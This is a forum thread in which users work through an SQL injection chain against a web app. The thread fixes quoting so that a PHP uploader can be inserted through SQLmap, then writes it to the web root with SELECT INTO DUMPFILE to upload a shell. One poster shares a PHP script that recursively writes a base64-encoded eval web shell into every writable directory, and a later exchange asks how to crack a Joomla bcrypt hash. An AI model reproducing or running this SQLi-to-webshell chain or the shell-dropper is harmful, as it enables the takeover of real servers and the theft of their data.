Jump to content

MySQL problem with inserting PHP code into DB


DrMTR
 Share

Recommended Posts

Hi to all !

I testing vulnerable app in localhost, and try to insert php upload form code into db table, but give me MySQL syntax error every time i tryed..

This htm form successfully inserted into DB via SQLmap

insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> 
<head>Upload File</head>
<body>
<<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</body>
</html>');

but this give me SQL syntax error in line 1 every time, when try to insert into DB:

insert into user_upload values ('
<?php
$target_path = '/var/www/';

$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

Where is the problem.?

I forget to tell that DB tables are allready created into DB exploitdb.

Link to comment
Share on other sites

You hvae a quoted string which you are breaking out of with quotes in the lines you are injecting, try changing all the quotes in the string to double quotes and the outside ones to single.

Sounds like an interesting vulnerability where you can pull a contents from a database and get them executed.

Link to comment
Share on other sites

The way SQL works is that when you want to put a string in a column, you say:

insert into table (column_name) values ('THE_DATA_TO_INSERT');

Note that the data to insert into column_name is delimited by the single quotes. When that THE_DATA_TO_INSERT itself contains single quotes, you need to escape them either by preceding each single quote with a slash (\') or, because HTML allows you to do this, use a double quote (") instead of the single quote character in your data.

Link to comment
Share on other sites

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

Link to comment
Share on other sites

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

So in fact if i change "blacklighted text" into " " will be OK?

insert into user_upload values ('
<?php
$target_path = "/var/www/";

$target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); 

if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) {
    echo "The file ".  basename( $_FILES["uploadedfile"]["name"]). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');
Link to comment
Share on other sites

Yeah SQL code inserted into DB table, and executes into evil php uploader.

Grab the content from SQL table and dump to .php file using these command:

select * into dumpfile '/var/www/uploadform.php' from userform;

select * into dumpfile '/var/www/uploader.php' from user_upload;


After that sumply execute uploadform.php and upload your favorite shell into host. Thanks for everything guys. :)

Link to comment
Share on other sites

Or have local file inclusion.

I tend to look for file upload features on sites which allow uploads into the document root, usually folders called userdata or uploads, they are writable when the rest isn't

Link to comment
Share on other sites

Ill provide some of my exciting automation :-p

this little snipp will recursively scan directorys for writable permissions and then write a small shell...

If you have php execution, phpinfo(); then try eval(codebelow);

carefule, this may write a few thousand shells to ur hard drive :-)

chdir('../');

$path = realpath(getcwd());

$objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST);

foreach($objects as $name => $object){

        if (is_dir($name)) {

                if (is_writable($name))  {

                        echo $name . ' ';

                        file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4="));

                }

        }

}

Link to comment
Share on other sites

^^ Thanks for script. Its very usefull for finding writable folders. I dont want to open a new thread, did someone know why this Joomla hash is very long compared with other hash in DB

$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB.

How to crack this one.?

Link to comment
Share on other sites

Fields are separated by the $ character.

2y means "The most secure version of Blowfish"

10 is the amount of blowfish iterations.

The remainder is the blowfish hash where I suspect the bit up to the slash is the salt and the remainder the actual hash value.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...